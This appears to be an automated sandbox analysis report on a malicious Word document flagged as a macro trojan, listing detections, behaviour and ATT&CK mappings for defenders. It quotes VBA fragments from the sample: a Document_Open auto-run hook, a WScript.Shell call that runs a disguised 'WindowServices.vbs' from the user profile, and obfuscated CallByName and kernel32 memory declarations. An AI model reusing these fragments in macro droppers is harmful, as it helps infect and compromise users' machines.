Edit tour

Windows Analysis Report
0dsIoO7xjt.docx

Overview

General Information

Sample name:	0dsIoO7xjt.docx renamed because original name is a hash value
Original sample name:	01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e.docx
Analysis ID:	1590809
MD5:	0e9896e59a862c48c6543c7cb0c8b58d
SHA1:	4681d90574c5644de87641b298b020f0dc076c06
SHA256:	01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e
Tags:	app8490744docxhko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Machine Learning detection for sample

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA which might only executes on specific systems (country or language check)

Document contains embedded VBA macros

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 7480 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 0dsIoO7xjt.docx	Virustotal: Detection: 50%			Perma Link
Source: 0dsIoO7xjt.docx	ReversingLabs: Detection: 42%

Machine Learning detection for sample

Source: 0dsIoO7xjt.docx

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

System Summary

Document contains an embedded VBA macro which may execute processes

Source: 0dsIoO7xjt.docx

OLE, VBA macro line: shell.Run """" & vbsFilePath & """", 1, True

Document contains an embedded VBA macro with suspicious strings

Source: 0dsIoO7xjt.docx	OLE, VBA macro line: CallByName kakensooe, methodName, VbMethod
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function CallTestAES, String callbyname: CallByName kakensooe, methodName, VbMethod	Name: CallTestAES
Source: VBA code instrumentation	OLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String environ: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"	Name: ikwiwiejs_19293_Ade
Source: VBA code instrumentation	OLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String wscript: Set shell = CreateObject("WScript.Shell")	Name: ikwiwiejs_19293_Ade

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String ObjectLength
Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String HashDigestLength

Source: 0dsIoO7xjt.docx	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ksksksksksksks, Function Document_Open			Name: Document_Open

Source: 0dsIoO7xjt.docx

OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal72.expl.evad.winDOCX@2/3@0/0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$sIoO7xjt.doc

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{053AB79E-ED38-4B79-928C-FFC3302C2CC2} - OProcSessId.dat

Jump to behavior

Source: 0dsIoO7xjt.docx

OLE indicator, Word Document stream: true

Source: 0dsIoO7xjt.docx

OLE document summary: title field not present or empty

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 0dsIoO7xjt.docx	Virustotal: Detection: 50%
Source: 0dsIoO7xjt.docx	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Window detected: Number of UI elements: 11
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Window detected: Number of UI elements: 11

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Data Obfuscation

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: 0dsIoO7xjt.docx	Stream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Module3			Name: Module3

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: 0dsIoO7xjt.docx

Stream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: 0dsIoO7xjt.docx

OLE indicator, VBA stomping: true

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	42 Scripting	Valid Accounts	Windows Management Instrumentation	42 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Obfuscated Files or Information	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0dsIoO7xjt.docx	51%	Virustotal		Browse
0dsIoO7xjt.docx	42%	ReversingLabs	Script-Macro.Trojan.Amphitryon
0dsIoO7xjt.docx	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590809
Start date and time:	2025-01-14 16:14:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0dsIoO7xjt.docx renamed because original name is a hash value
Original Sample Name:	01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e.docx
Detection:	MAL
Classification:	mal72.expl.evad.winDOCX@2/3@0/0
Cookbook Comments:	Found application associated with file extension: .docx

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 52.109.32.7, 199.232.210.172, 2.23.242.162, 2.20.245.216, 2.20.245.225, 52.111.243.41, 52.111.243.43, 52.111.243.40, 52.111.243.42, 20.189.173.10, 20.189.173.28, 52.149.20.212, 40.126.31.69, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, onedscolprdwus18.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, ukw-azsc-000.roaming.officeapps.live.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akad
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
